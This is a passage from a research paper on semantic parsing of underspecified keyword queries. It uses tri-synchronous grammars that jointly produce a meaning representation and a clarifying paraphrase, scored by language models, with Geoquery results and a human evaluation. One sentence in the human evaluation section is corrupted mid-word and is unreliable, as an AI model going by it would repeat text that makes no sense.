previous example, but also more pernicious problems unique to the more ambiguous input. Focusing on the queries “Kobe hotels” and “Kobe flight” we can see that it is also necessary to estimate the latent relationship between Search Query Meaning Representation Paraphrase Kobe Hotel λx (hotel(x) ∧ in(x, kobe city)) Hotel in Kobe city Kobe Flight λx (flight(x) ∧ to(x, kobe city)) Flight to Kobe city Kobe Height height(kobe bryant) Height of Kobe Bryant Table 1: Example of a search query, MR, and its paraphrase words, such as “location” or “destination.” However it should be noted that if we take the keyword query and re-express it as a more explicit paraphrase, we can reduce this ambiguity to the point where there is only one reasonable interpretation. For example, in the second line, if we add the preposition “to” the user is likely asking for flights that arriving in Kobe, and if we add “from” the user is asking for depar- tures. In this paper, we focus on SP of ambiguous input and propose a new method for dealing with the prob- lem of ambiguity. Here we propose a framework where an ambiguous input (Column 1 in Table 1) is simultaneously transformed into both its MR (Col- umn 2) and a more explicit, less ambiguous para- phrase (Column 3). The advantage of this method is that it is then possible to verify that the paraphrase indeed expresses the intended meaning of the under- specified input. This verification can be done either manually by the system user or automatically using a probabilistic model trained to judge the naturalness of the paraphrases. As a concrete approach, building upon the formal- ism of synchronous context free grammars (SCFG). Unlike traditional SCFGs, which usually only gen- erate one target string (in semantic parsing, an MR), we introduce a new variety of SCFGs that generate multiple strings on the target side. This allows us to not only generate the MR, but also jointly gen- erate the more explicit paraphrase. We then use a language model over the paraphrases generated by each derivation to help determine which derivations, and consequently which MRs, are more likely. We perform an evaluation using the standard Geo- query benchmark of 880 query-logic pairs. First we note that baseline SCFG parser achieves reasonable accuracy on regular questions but when the same method is used with underspecified input, the system accuracy decreases significantly. On the other hand, when incorporating the proposed tri-synchronous grammar to generate paraphrases and verify them with a language model, we find that it is possible to recover the loss of accuracy, resulting in a model that is able to parse the ambiguous input with signif- icantly better accuracy. 2 Semantic Parsing using Context Free Grammars As a baseline SP formalism, we follow Wong and Mooney (2006) in casting SP as a problem of trans- lation from a natural language query into its MR. This translation is done using synchronous context free grammars, which we describe in detail in the following sections. 2.1 Synchronous Context Free Grammars Synchronous context free grammars are a general- ization of context-free grammars (CFGs) that gener- ate pairs of related strings instead of single strings. Slightly modifying the notation of Chiang (2007), we can formalize SCFG rules as: X → ⟨γs, γt⟩ (1) where X is a non-terminal and γs and γt are strings of terminals and indexed non-terminals on the source and target side of the grammar. SCFGs have recently come into favor as a tool for statistical machine translation (SMT). In SMT, a synchronous rule could, for example, take the form of: X → ⟨X0 eats X1, X0 wa X1 wo taberu⟩ (2) where γs is an English string and γt is a Japanese string. Each non-terminal on the right side is in- dexed, with non-terminals with identical indices cor- responding to each-other. Given the SCFG grammar, we can additionally as- sign a score to each rule, where higher scored rules are more likely to participate in a derivation. Given the grammar of scored rules, and an input sentence Grammar r0 QUERY → ⟨give me the CONJ0, answer(x1, CONJ0)⟩ r1 CONJ → ⟨FORM0 FORM1 STATE2, (FORM0, FORM1, const(x2, stateid(STATE2))⟩ r2 FORM → ⟨cities, city(x1)⟩ r3 FORM → ⟨in, loc(x1, x2)⟩ r4 STATE → ⟨virginia, virginia⟩ Derivations ⟨QUERY0, QUERY0⟩ r0 ⇒ ⟨give me the CONJ1, answer(x1, CONJ1))⟩ r1 ⇒ ⟨give me the FORM2 FORM3 STATE4, answer(x1, (FORM2, FORM3, const(x2, stateid(STATE4))))⟩ r2 ⇒ ⟨give me the cities FORM3 STATE4, answer(x1, (city(x1), FORM3, const(x2, stateid(STATE4)))⟩ r3 ⇒ ⟨give me the cities in STATE4, answer(x1, (city(x1), loc(x1,x2), const(x2, stateid(STATE4)))⟩ r4 ⇒ ⟨give me the cities in virginia, answer(x1, (city(x1), loc(x1, x2), const(x2, stateid(virginia)))⟩ Figure 1: Example of SP using SCFGs. The left hand and right hand sides are generated simultaneously. S, the highest scoring parse and output sentence T can be calculated using the CKY+ algorithm (Chi- ang, 2007). 2.2 Semantic Parsing with SCFGs In the simplest form of SP with SCFGs, γs is used to construct a natural language string S and γt is used to construct the MR T (Wong and Mooney, 2006). Figure 1 shows an example of using an SCFG to si- multaneously generate a natural language string and its MR. In this picture, the bold symbols are non- terminals which can be substituted with other non- terminal productions. Productions end when all the tokens are terminals. The collection of rules used to generate a particular ⟨S,T ⟩ pair is a derivation D= d1, d2, ..., d|D|. Wong and Mooney (2007) further extended this formalism to handle λ-SCFGs, which treat γs as the natural language query and γt as an MR based on λ calculus. SCFG rules are automatically learned from pairs of sentences with input text and the corre- sponding MR, where the MR is expressed as a parse tree whose internal nodes are predicates, operators, or quantifiers. In this paper, we follow Li et al. (2013)’s approach to extract a grammar from this parallel data. In this approach, for each pair, statistical word alignment aligns natural language tokens with the correspond- ing elements in the MR, then according to the align- ment, minimal rules are extracted with the GHKM algorithm (Galley et al., 2004; Li et al., 2013). Then, up to k minimal rules are composed to form longer rules (Galley et al., 2006), while considering the re- lationship between logical variables. Finally, un- aligned NL tokens are aligned by attaching them to the highest node in the tree that does not break the consistencies of alignment, as specified in Galley et al. (2006). 2.3 Additional Rules While basic rules extracted above are quite effective in parsing the training data,2 we found several prob- lems when we attempt to parse unseen queries. To make our parser more robust, we add two additional varieties of rules. First, we add a deletion rule which allows us to delete any arbitrary word w with any head symbol X, formally: X → ⟨w X, X⟩. (3) This rule allows our grammar an option of ignoring words that it does not know what to do with. 2We achieve almost 100% F-measure in closed testing. In addition, to ensure that all of the facts in the database can be accessed by our semantic parser, we provide some additional SCFG rules based on the given database of facts. The Geoquery dataset pro- vides a database of facts represented as logical asser- tions. For every assertion provided in the database, we produce a single rule using the function name as the label of the non-terminal and one parameter of the assertion as the terminal, depending on the asser- tion’s type. For example, Geoquery provides some details about the state of Michigan with the form state(’michigan’,...), and thus we add STATE → ⟨michigan, michigan⟩ as an additional rule in the grammar. 3 Semantic Parsing of Keyword Queries As explained in Section 1, when users input key- word queries, they will often ignore the grammatical structure and omit function words. Based on this, a traditional SP model can be problematic. To give a concrete example, consider the synchronous parse in Figure 1. If we try to parse with only the keywords (e.g. “cities virginia”) with a standard grammar, the parser will not be able to recover the latent relation- ship “loc(x1, x2)” between the two words. Unfortu- nately, we are lacking evidence to recover this re- lationship, because the token “in” associated with the predicate “loc” will often not occur in a keyword query. In this work, we perform experiments on this par- ticular variety of ambiguous input, both to examine the effect that it has on parsing accuracy under the baseline model, and to examine whether this sort of ambiguity can be reduced. In order to do so, we need examples of keyword queries. In this work, we sim- ulate the keyword query K by altering the original question S to make it more closely match the style of keyword queries. In particular, following the analy- sis of Leveling (2010), we make two changes to the original queries: stop word deletion, and word order shuffling. Stop word deletion, as its name implies, sim- ply deletes all stop words from the input sentence. We use a stop word list,3 making a few subjective changes to make the simulated keyword output more 3http://www.lextek.com/manuals/onix/stopwords2.html realistic. Specifically, we add “give” and “show,” which often occur in statements such as “give me ...” or “show me ...” but are unnatural in keyword queries. We also exclude from the list “us,” which often refers to “United States,” and function words such as “many,” “most,” and “much.” Word order shuffling permutes the order of the keywords remaining after stop word deletion, to simulate the fact that keyword queries often don’t have strict order. First we shuffled the tokens ran- domly, then had a human annotator fix the order of the keywords manually, making the minimal num- ber of changes necessary to ensure that the queries are natural and fluent. This produced a single key- word query K for a particular question/MR pair in the Geoquery database, which will be used to train and verify our system. At the end we will have a 3- parallel corpus consisting of 880 pairs of keyword, question, and the meaning representation. We should note that while shortening and reorder- ing are prominent features of search queries (Lev- eling, 2010), these are not the only phenomenon distinguishing queries from standard text. For ex- ample, humans tend to also change content words into an equivalent and easier word of their prefer- ence (Gurský et al., 2009). While collecting this data is out of the scope of the present work, if a cor- pus of real keyword inputs and question paraphrases were available, it is theoretically possible for our proposed method to learn from this data as well. 4 Joint Semantic Parsing and Paraphrasing using Tri-Synchronous Grammars In this section we describe our proposed method to parse underspecified and ungrammatical input while jointly generating a paraphrase that can be used to disambiguate the meaning of the original query. 4.1 Generalized Synchronous Context Free Grammars Before defining the actual parsing framework, we first present a generalization of SCFGs, the n- synchronous context free grammar (n-SCFG) (Neu- big et al., 2015). In an n-SCFG, the elementary structures are rewrite rules of n − 1 target sides: X → ⟨γ1, γ2, ..., γn⟩ (4) Grammar r0 QUERY → ⟨CONJ0, give me the CONJ0, answer(x1, CONJ0)⟩ r1 CONJ → ⟨FORM0 STATE1, FORM0 in STATE1, (FORM0, loc(x1, x2), const(x2, stateid(STATE1)))⟩ r2 FORM → ⟨cities, cities, city(x1)⟩ r3 STATE → ⟨virginia, virginia, virginia⟩ Derivations ⟨QUERY0, QUERY0, QUERY0 ⟩ r0 ⇒ ⟨CONJ0, give me the CONJ0, answer(x1, CONJ0)⟩ r1 ⇒ ⟨FORM2 STATE3, give me the FORM2 in STATE3, answer(x1, (FORM2, loc(x1, x2), const(x2, stateid(STATE3))) ⟩ r2 ⇒ ⟨cities STATE3, give me the cities in STATE3, answer(x1, (city(x1), loc(x1, x2), const(x2, stateid(STATE3)))⟩ r3 ⇒ ⟨cities virginia, give me the cities in virginia, answer(x1, (city(x1), loc(x1, x2), const(x2, stateid(virginia)))⟩ Figure 2: An example of 3-SCFG rules and productions. Here there are 2 target sides, one is the paraphrase and the other is the MR where X is a non-terminal symbol, γ1 is the source side string of terminal and non-terminal symbols, and γ2, ...γn are the target side strings. Therefore, at each derivation step, one non-terminal in γ1 is cho- sen and all the corresponding non-terminals with the same index in {γ2, ..., γn} are rewritten using a sin- gle rule. 4.2 Tri-Synchronous Grammars for Joint Parsing and Paraphrasing Based on this framework, we propose a model for joint semantic parsing and paraphrasing using tri- synchronous grammars, or 3-SCFGs. In this frame- work, input γ1 corresponds to a keyword query K, and the outputs γ2 and γ3 correspond to the para- phrase and MR respectively. An example of jointly generating a keyword query, question, and MR with a 3-SCFG is shown in Figure 2. In this work, we construct the tri-synchronous grammar by transforming the basic SCFG for se- mantic parsing G into a 3-SCFG. Specifically, we first assume that the source question γs and target MR γt of the original SCFG become the two out- puts γ2 and γ3 of the new 3-SCFG grammar. γ1 is the newly added keyword query input. During the process of model training, we first ex- tract rules consisting of γ2 and γ3 using the algo- rithm in Section 2.2, then generate γ1 from γ2 by first deleting the stop-words then rearranging the or- der of the words based on word alignments between the keyword query and the original question. This is done by assigning each word in K a range of words in S to which it is aligned, then sorting words in γ1 in ascending order of these ranges. It is possible to have cases in which there are some words in K that have no alignment in S, and these rules are filtered out. Finally, we use the tuple ⟨γ1, γ2, γ3⟩ to form rules in our tri-synchronous grammar. Because of the stop word deletion, we may find that some rules have an empty source side, and con- sequently cannot be used in an SCFG. For example, in r3 in Figure 1, “in” is in the stop word list, and thus will be deleted from the source side, leaving it empty. In order to solve this problem, we compose all rules with empty inputs together with their parent rule. It should be noted that this introduces a large amount of ambiguity into the grammar, as the con- tent represented by the deleted content word must now be generated essentially out of thin air, based only on its parent context. 4.3 Integrating Language Models with Tri-SCFGs When using SCFGs for machine translation, the power of language models (LM) to improve the translation accuracy is widely acknowledged. The LM ensures fluent SMT output by assigning a prob- ability to the target sentence. In case of n-gram lan- guage models, this probability is defined as: pLM(W) = l∏ i=1 p(wi|wi−1, wi−2, ...wi−n+1) (5) where the probabilities of sentence W of length l is calculated as the product of the probability of its words, depending on the previous n − 1 words. In- tegrating these language models makes the search space larger, precluding the use of the full CKY-style parsing algorithm, but efficient approximate search algorithms such as cube pruning (Chiang, 2007) or incremental search (Heafield et al., 2013) can help ameliorate this problem. We could also consider constructing a probabilis- tic LM over MR T for semantic parsing. However, constructing a language model for the MR is less straightforward for several reasons. First, the order of the words of MR in the same rooted logical tree will not make a difference in the final result (e.g. for a commutative operator node). Second, while lan- guage models for natural text benefit from the large amounts of text data available on the web, obtaining correct MRs to train a model is less trivial. On the other hand, in our tri-synchronous gram- mar framework, in addition to the MR itself, we are generating a paraphrase that nonetheless holds some disambiguating power over the MR, as described in Section 1. The naturalness of this paraphrase out- put, like the output of the MT system, can easily be judged by a language model, and might have some correlation with the naturalness of the MR itself. Thus, in this work we add a language model over the paraphrase output as a feature of the scoring model described in the next section. 5 Parse Scoring Given this SCFG-based parsing model, we must now assign a score to decide which scores are bet- ter or worse than others. 5.1 Scoring Function Our scoring function is a standard log linear model with feature functions defined over ⟨K,S,T ,D⟩ tu- ples: score(K,S,T ,D) = w · Φ(K,S,T ,D) (6) where Φ(K,S,T ,D) is a vector of feature functions and w is the weight vector. 5.2 Features For the baseline model, our feature vector Φ(K,S,T ,D) is simply defined as the element-wise sum of the feature vectors for each rule in the deriva- tion: Φ (K,S,T ,D) = ∑ d∈D Φ (d) (7) where d takes the form in Equation (4). We score each basic rule using features widely used in translation as follows: • Forward Probability: The log probabil- ity of source side given all the target sides p(γ1|γ2, ..., γn), calculated based on rule counts in the training corpus c(γ1, ..., γn)/c(γ2, ..., γn). • Backward Probability: Similarly, the log prob- ability of all target sides given the source side p(γ2, ..., γn|γ1). • Joint Probability: The log probability of the source and target p(γ1, γ2, ..., γn). • Terminal Rule: Equal to one if there is no non- terminal symbol in the rule. This feature is use- ful to decide whether the model prefers entirely lexicalized rules. • Deletion: Binary feature for deletion rules. • Knowledge Base Rule: Binary feature for rules produced from the knowledge base. For the proposed tri-synchronous grammar with LM verification, we additionally add three features defined over the generated paraphrase. • Language Model: Counts the log language model probability of the paraphrase. • Unknown: Counts the number of tokens in the paraphrase that are unknown in the language model. • Paraphrase Length: Counts the number of words in the paraphrase, and can be calculated for each rule as the number of terminals in the paraphrase. This feature helps compensate for the fact that language models prefer shorter sentences. 5.3 Learning Feature Weights Now that we have defined the feature space, we need to optimize the weights. For this we use minimum error rate training (MERT) (Och and Ney, 2003), maximizing the number of correct answers over the entire corpus.4 6 Experiment and Analysis We evaluate our system using the Geoquery corpus (Zelle and Mooney, 1996), which contains 880 sen- tences representing natural language questions about U.S. Geography, and their corresponding MRs. 6.1 Setup • Data: We use the full Geoquery dataset us- ing the same 10 folds of 792 and 88 test data used by Wong and Mooney (2007). We cre- ated keyword queries according to the process described in Section 3. We follow standard pro- cedure of removing punctuation for all natural language text, regardless of whether it is a key- word or full question. We also perform stem- ming on all natural language text, both in the keyword and question queries. • Rule Extraction: Alignment is performed by pialign (Neubig et al., 2011) with the set- ting forcing one-to-many alignments. The al- gorithm to extract the tri-synchronous grammar is as discussed in Section 4.2 and maximum size of the rules for composition is 4. • Decoding: To query the database, we use prolog queries fired against the Geoquery 4We also tried gradient-based optimization methods and large feature sets as in Wong and Mooney (2007) and Li et al. (2013), but the dense feature set and MERT achieved similar results with shorter training time. database. The parsing problem can thus be con- sidered the task of decoding from underspec- ified natural language queries into prolog queries. This is done by performing decoding of the SCFG-based parsing model to translate the input query into an MR including λ calculus expressions, performing β-reduction to remove the λ function, then firing the query against the database. Before querying the database, we also apply Wong and Mooney (2007)’s type- checking to ensure that all MRs are logically valid. For parsing, we implemented CKY- based parsing of tri-synchronous grammars on top of the Travatar (Neubig, 2013) decoder. Unless otherwise specified, the default settings of the decoder are used. • Language Model: For all 3-SCFG systems we use a 4-gram Kneser-Ney smoothed lan- guage model trained using the KenLM toolkit (Heafield, 2011). Standard preprocessing such as lowercasing and tokenization is performed before training the models. As it is of inter- est whether or not the type of data used to train the language model affects the resulting perfor- mance, we build language models on several types of data. First, we use a corpus of news data from the Workshop on Machine Translation evaluation data (Callison-Burch et al., 2011) (News). This data represents standard English text unrelated to questions. Second, we use a part of the question paraphrase data gathered by Fader et al. (2013) (Questions).5 This data consists entirely of questions, and thus is a better rep- resentative of the latent questions behind the input queries. Finally, we used the full ques- tions from Geoquery sentences to build the language model, building a different language model for each fold, completely separate from the test set. Table 2 gives the details of each dataset. In addition, because the Geoquery data is useful but small, for all 3-SCFG systems, we perform experiments using an additional 4- 5We use only data set 0 from the 30 sets released at http://knowitall.cs.washington.edu/afader/paraphrases. Data Sent. Tok. LM Size News 44.0M 891M 5.5G Questions 20.2M 174M 1.5G Geoquery 792 ∼1.6K ∼96K Table 2: Details of the data used to build LMs gram feed-forward neural network language model (NNLM) (Bengio et al., 2003) feature, which is possibly better equipped to handle sparse data than standard n-grams. The NNLM is built on Geoquery sentences, excluding the test sentences for each fold. This feature is not produced during parsing, but is separately scored and used to re-rank the n-best list gen- erated by the parser. Integration with the paraphrase language model is performed using incremental search (Heafield et al., 2013). For the parsing with NNLM, we recalculate the score of the para- phrases by firstly adding the NNLM score as one of the feature in Equation 6 and taking the parse with the best score. • Parameter Optimization: For learning the pa- rameters of the scoring function we use 10-fold cross validation on the training data, i.e. each fold iteration uses model trained on 712 exam- ples and to parse the remaining 79. First we run decoding for all folds and gather the results. Then we run MERT with the combined results to update the parameters. We use the standard evaluation measure of question answering ac- curacy as our objective function and set the n- best list to be the top 300 derivations. To learn the weights for rescoring with the NNLM, we first generate an n-best list with the base model not using the NNLM feature. We then calculate the NNLM feature for each hy- pothesis in the n-best list, and run one more run of MERT with this feature to obtain the weights used in the rescoring model. • Evaluation: Following the definition from Zettlemoyer and Collins (2005) and Wong and Mooney (2007), we use question answering ac- curacy as our evaluation measure. We define recall as the fraction of correct answers divided by the number of test data, precision as the frac- tion of correct answers divided by the number of parsed queries and F-measure as the har- monic mean of the two. The query is judged correct if and only if the SCFG can gener- ate a valid parse tree, and the resulting query does not produce any syntax errors when ac- cessing the database through a prolog query. Note that all 880 questions are used for testing through cross validation, so a recall improve- ment of 0.001 is approximately equal to an- swering one more question correctly. 6.2 Parsing Accuracy Results Input Method P R F Question Direct .880 .878 .879 Keyword Direct .792 .790 .791 Tri-LM .804 .790 .797 Tri+LM .830 .820 .827 Table 3: Parsing accuracy, where Keyword Direct is the baseline for semantic parsing on keyword queries, and the Tri with the LM for verification is our proposed method. Bold indicates a significant gain over both Direct and Tri- LM for keyword input according to bootstrap resampling (Koehn, 2004) (p < 0.05). First, in this section, we examine the effect of the proposed method on accuracy of parsing ambiguous keyword queries. Specifically, in Table 3 we show the baseline “Direct” method of training a standard SCFG-based semantic parser, the proposed method without language model verification “Tri-LM,” and the proposed method using the Questions lan- guage model with NNLM reranking “Tri+LM.” Looking at the baseline accuracy over full ques- tions (first row), we can see the recall is slightly su- perior to Wong and Mooney (2007)’s 86.6% and Li et al. (2013)’s 87.6%, demonstrating our baseline is comparable to previous work. When we apply the same method to parse the keyword queries (second row), however, the recall drops almost 9%, showing that the ambiguity included in the keyword query in- put causes large decreases in accuracy of a semantic parser built according to the baseline method. This ambiguity is also reflected in the number of MRs generatable by the parser for any particular input. In the top 300 list generated by each parser, there were Ex. LM Paraphrase/MR Correct 1 Direct answer(A,(capital(A),loc(A,B),largest(C,population(B,C)))) no Tri-LM answer(A,largest(B,(capital(A),population(A,B)))) yes Tri+LM what capital has the largest population Original Question: what capital has the largest population Original MR: answer(A,largest(B,(capital(A),population(A,B)))) Keyword: largest population capital 2 Direct(-) answer(A,largest(A,(capital(A),city(A),loc(A,B),state(B)))) no Tri-LM answer(A,largest(A,(state(A),loc(A,B),capital(B)))) no what is the largest state in capital Tri+LM answer(A,(state(A),loc(B,A),largest(B,capital(B)))) yes what state has the largest capital Original Question: what state has the largest capital Original MR: answer(A,(state(A),loc(B,A),largest(B,capital(B)))) Keyword: largest capital state Table 4: Examples of paraphrase outputs produced by the direct keyword-MR system, and the proposed systems without and with a language model. a total of 16.54 and 36.77 unique MRs for question and keyword input respectively. Now we take a look at the 3-SCFG (third row) without the LM verification, we can see the results are similar to the baseline. Then, when adding the language model to the 3-SCFG system (fourth row) we can see a significant of 3-4% gain over the Di- rect and the Tri-LM systems, demonstrating that the proposed method of paraphrasing and verification is indeed able to resolve some of the ambiguity in the keyword queries. To illustrate how the language model helps, we provide two examples in Table 4. The first example shows that considering the original question when parsing from keywords can help improve alignment with the MR for more plausible results. The sec- ond example shows the effect of adding the language model to disambiguate the keyword query. Here there are several interpretations for the keyword- query “largest capital state,” which also can mean “state that has the largest capital,” or “largest state in the capital.” The system without the language model incorrectly chooses the latter interpretation, but the system with language model correctly dis- ambiguates the sentence as it considers the phrase “state in capital” is unlikely, showing the effective- ness of our method. 6.3 Analysis We first examine the effect of choice of language model in the first two columns of Table 5. The first column is the full model with NNLM re-ranking, and the second column is without. The rows show the effect of using different data to train the n-gram LM. All the systems using LMs are basically bet- ter than the system using neither an n-gram LM nor the NNLM. Looking at the differences between the n-gram LMs, we can see that the Questions LM tends to be the most effective. This is particularly encouraging as the Questions language model does not contain any domain specific content, but is able to outperform the Geoquery domain spe- cific LM. We also found that, as expected, the more sophisticated neural network language model raises the system accuracy by approximately 2%, which also supports our proposed idea that a better LM will better raise system accuracy. The proposed method aims at reducing nonsen- sical interpretations, and another trivial baseline that can achieve a similar effect is to filter out the queries that produce empty answers, with the as- sumption that empty answers are generated from in- valid queries. This simple filtering method reduced the number of unique queries to 11.74 for questions and 20.16 for keywords. However, as shown in the “-Empty” results in Table 5, we found that this fil- Input Output LM Full -NNLM -Empty P R F P R F P R F Keyword Q+MR - .828 .813 .821 .804 .790 .797 .820 .784 .801 News .823 .814 .819 .806 .797 .802 .817 .786 .802 Quest .830† .820† .827† .809 .804 .806 .806 .780 .793 Geo .821 .812 .817 .804 .794 .799 .824 .794 .808 Table 5: The result of experiment with/without neural network language model for the proposed 3-SCFG framework. Question-LM +NNLM achieved the best accuracy. Bold indicates a significant gain over the baseline Direct Keyword (second row of Table 3) and dagger indicates a significant gain over the 3-SCFG baseline without language model (-NNLM column, first row). The Full and -Empty column use NNLM as language model. The first row of the -NNLM column is the experiment without any language model. tering method is not effective, causing the system’s performance to drop by around 2%. This is caused by the fact that the correct answer is sometimes an empty answer, for example “what states border hawaii?” 6.4 Human Evaluation While all evaluation up to this point has used lan- guage models to disambiguate paraphrases, we can assume that human users will be even better at judg- ing whether or not a paraphrase makes sense. Thus, we perform an additional evaluation in which hu- man annotators evaluate the paraphrases generated from the systems. First, we took the 1-best parse and 7 random parses from the Tri+LM and Tri-LM systems where both systems produced a non-empty n-best. Then we show both the keyword queries and all the paraphrases to human evaluators to annotate: i) a fluency score of 0, 1, or 2 where 0 is completely unnatural English, 1 indicates minor grammatical errors, and 2 indicates flawless English, ii) a letter starting from “A”, “B”, etc. for the paraphrase that matches their preferred interpretation of the search query.6 If the input has multiple interpretations, then a different letter is assigned for each possible inter- pretation in the order that the annotator believes that the interpretation is the correct one, and only para- phrase paraphrase is chosen for each interpretation. If the human annotator does not find the paraphrase that matched his/her pboth features set.igned and an- notation starts from “B.” 3 annotators were asked to annotate 300 keyword queries and their paraphrases. 6Here the letters are just the indicators of ranking with a let- ter “A” means the most possible interpretation of search queries according to the users. There are a total of 866 keyword queries (out of 880) that produced a non-empty n-best list in both sys- tems, so we chose random duplications of 34 inputs to make the sum 900. System Precision Tri-LM .803 Tri+LM .834 Tri+LM+Human .846 Table 6: System precision with additional human help. Table 6 shows the improvement of the system with human help. We take all the answers from the annotators that were annotated with “A” and re- placed the answer of Tri+LM system. Overall, there were 35 questions that changed between the 1-best and human choices, with 23 improving and 12 de- grading accuracy. This experiment suggests that it is possible to show the generated paraphrases to hu- man users to improve the accuracy of the semantic parser. System Fluency Ratio Precision Tri-LM 0 .163 .415 1 .425 .819 2 .411 .940 Tri+LM 0 .083 .367 1 .372 .811 2 .544 .918 Table 7: Fluency, Ratio, and Precision statistics for the one-best of both systems. Now we look at the relationship between the flu- ency of the paraphrase and the accuracy of the se- mantic parsers in Table 7. The statistics are gathered Letter System Count Total Precision A Tri-LM 547 721 .919 Tri+LM 674 .902 B Tri-LM 308 452 .772 Tri+LM 340 .752 C Tri-LM 57 94 .631 Tri+LM 52 .557 D Tri-LM 7 13 .428 Tri+LM 7 .142 Table 8: A result for the letter accuracy from the human evaluation. Note that counts do not sum up to total be- cause it is possible that both systems generate same para- phrases. from the one best output for both systems. Tri+LM had a significantly larger percentage of fluent para- phrases with score “2” (54% v.s. 41%) compared to the system without the language model. Of the paraphrases that were assigned “2” score, 91% cor- responded to correct MRs, indicating that the sub- jective fluency of the paraphrase is a good indicator of parsing accuracy. Finally, Table 8 shows the relationship between the rank of the human interpretation and the accu- racy of semantic parsing. Out of the 900 problems shown to the annotators, 721 of them were ranked “A.” This experiment showed that the interpretation of the paraphrase judged as most likely by the anno- tators achieves a high precision, confirming our hy- potheses that humans are able to use paraphrases to accurately judge whether the interpretation is likely to be correct or not. 6.5 Other Methods for Using Paraphrase Data In addition to the method describe up until this point, there are several other ways to potentially incorpo- rate paraphrasing into syntactic parsing of under- specified input. In this section we briefly outline two other (unsuccessful) attempts to do so: creation of a pipelined paraphrasing/semantic parsing sys- tem, and addition of features from a large paraphrase database. First, regarding the pipelined system, we build the paraphrasing system using the parallel keyword- question data, with standard settings of hierarchical phrase-based translation (Chiang, 2007), and stan- dard SMT features. We use the Geoquery n-gram model for the language model used during decoding and NNLM language model to finally rerank the n- best list. As a result of experiments, even though this system obtained a respectable BLEU score of 57.5, the parsing accuracies were much lower than the direct keyword-MR system at 64.8 F-measure. An analysis showed that, perhaps as expected, this was caused by cascading errors, with unnatural para- phrases also resulting in failed semantic parses. In addition, we also attempted to use the external Questions data to calculate additional features to our Tri+LM system. We do this by first simulat- ing the keyword version for each sentence in the Questions data by performing shuffling and stop- word deletion.7 Next we train a hierarchical phrase-based system on this data to create a paraphrasing model. Next we intersect this model with our existing model by matching the source side and the target side of the rules and if they match, taking the union of the fea- tures sets. Unfortunately, however, this setting also did not allow for a gain in accuracy, likely due to to the low recall (15%) of the matching between paraphrasing grammar and semantic parsing rules. This low recall stemmed from a number of factors including restrictions on the standard Hiero para- phrasing grammars (no more than 2 non-terminals, no consecutive non-terminals on the source side, and no rules without at least one terminal), as well as simple lack of coverage of the words in the para- phrase database. This result does indicate room for improvement by developing algorithms that extract paraphrases that are closely related to the semantic parsing rules, but also suggests potential difficulties in simply applying paraphrasing resources such as PPDB (Ganitkevitch et al., 2013). 7 Related Work Interpretation of search queries is a major concern in the field of information retrieval as it can affect the choice of retrieved documents. Underspecified queries are commonly entered into search engines, leading to large result sets that are difficult for users 7Because the shuffling process is random we could conceiv- ably generate and train with multiple shuffled versions, but be- cause the Questions data is relatively large already, we only train the paraphrasing system with the single permutation of keywords generated by the shuffling. to navigate (Sajjad et al., 2012). Studies have shown that there are several ways to deal with this problem, including query reformulation, which can fall in the categories of query expansion or query substitution (Shokouhi et al., 2014; Xue and Croft, 2013). Lev- eling (2010) proposed a paraphrasing method that tries to reconstruct original questions given keyword inputs in the IR context, but did not model this re- formulation together with semantic parsing. In ad- dition, Wang et al. (2013) showed that doing para- phrasing on the queries for web search is able to re- duce the mismatch between queries and documents, resulting in a gain in search accuracy. Using paraphrasing to resolve ambiguity is not new, as it was used to resolve ambiguity interac- tively with a user’s input (McKeown, 1983). Ge and Mooney (2009) and Miller et al. (1994) have also used the guidance of natural language syntax for semantic parsing. However, the usage of natu- ral language syntax in the semantic parsing on key- word queries are not trivial. For example, the ap- proach using syntax tree of the input side from Ge and Mooney (2009) can not be directly applied to the keyword query as syntax parsing on keyword query itself is not a trivial problem. There have also been a few methods proposed to combine paraphrasing with semantic parsing. Fader et al. (2013) proposed a method to map from full questions to more canonical forms of these ques- tions, with the canonical NL questions being triv- ially convertible to an MR. Berant and Liang (2014) extract entities from a full-text question, map these entities into a set of candidate MRs, and generate canonical utterances accordingly. Then the canoni- cal utterance that best paraphrases the input is cho- sen, thereby outputting the corresponding MR. Our approach is the similar but orthogonal to these works in that we focus on situations where the original user input is underspecified, and try to generate a natu- ral language paraphrase that more explicitly states the user intention for disambiguation purposes. A second difference is that we do not use separate model to do paraphrasing, instead using the same model to do paraphrasing and semantic parsing syn- chronously. This has the advantage of being able to scale more easily to complicated and highly com- positional questions such as the ones found in Geo- query. In addition to being useful for semantic parsing, SCFGs have also been used for paraphrasing. A va- riety of research has used SCFG-based paraphrases for text-to-text generation tasks like sentence com- pression (Cohn and Lapata, 2009; Ganitkevitch et al., 2011), or expanding the set of reference transla- tions for machine translation evaluation (Madnani et al., 2007). In this paper we have introduced a novel use of 3-way SCFGs that allows us to simultane- ously do semantic parsing and text-to-text genera- tion. To our knowledge, this is the first method to parse an underspecified input by trying to reconstruct a more explicit paraphrase of the input and validate the naturalness of the paraphrase to disambiguate the meaning of the original input. 8 Conclusion and Future Work In this paper we introduced a method for construct- ing a semantic parser for ambiguous input that para- phrases the ambiguous input into a more explicit form, and verifies the correctness using a language model. We do so through a generalization of syn- chronous context free grammars that allows for gen- eration of multiple output strings at one time. An evaluation showed that our method is effective in helping compensate for the 9% loss of system accu- racies due to the ambiguity of the keyword queries, providing a 3% improvement. Human evaluation also confirmed that manually evaluating the para- phrases generated by our framework can improve the accuracy of the semantic parser further. There are a number of future directions for this study. First, we plan to scale the proposed method to open domain semantic parsing of search queries over extensive knowledge bases such as FreeBase (Bollacker, 2007). In addition, previous works have tackled semantic parsing directly from question and answer pairs (Liang et al., 2011; Poon and Domin- gos, 2009; Artzi and Zettlemoyer, 2011). The idea of learning from unannotated data is attractive, and incorporating this learning framework into our model is a promising direction for future work. Acknowledgments We thank Professor Yuji Matsumoto and Assistant Professor Kevin Duh for the discussions and insight- ful ideas for the paper. We also thank Professor Chris Callison-Burch and anonymous reviewers for their suggestions and discussions. This project is supported by grants from the Min- istry of Education, Culture, Sport, Science, and Technology of Japan and from the Microsoft CORE program. References Yoav Artzi and Luke Zettlemoyer. 2011. Bootstrapping semantic parsers from conversations. In Proceedings of the 2011 Conference on Empirical Methods in Nat- ural Language Processing (EMNLP), pages 421–432. Yoshua Bengio, Ducharme Réjean, Pascal Vincent, and Christian Janvin. 2003. A neural probabilistic lan- guage model. The Journal of Machine Learning Re- search, 3:1137–1155. Jonathan Berant and Percy Liang. 2014. Semantic pars- ing via paraphrasing. In Proceedings of the 52th An- nual Meeting of the Association for Computational Linguistics (ACL), pages 1415–1425. Kurt Bollacker. 2007. A platform for scalable, collabo- rative, structured information integration. In Proceed- ings of the 22nd Association ofr Advancement of Arti- ficial 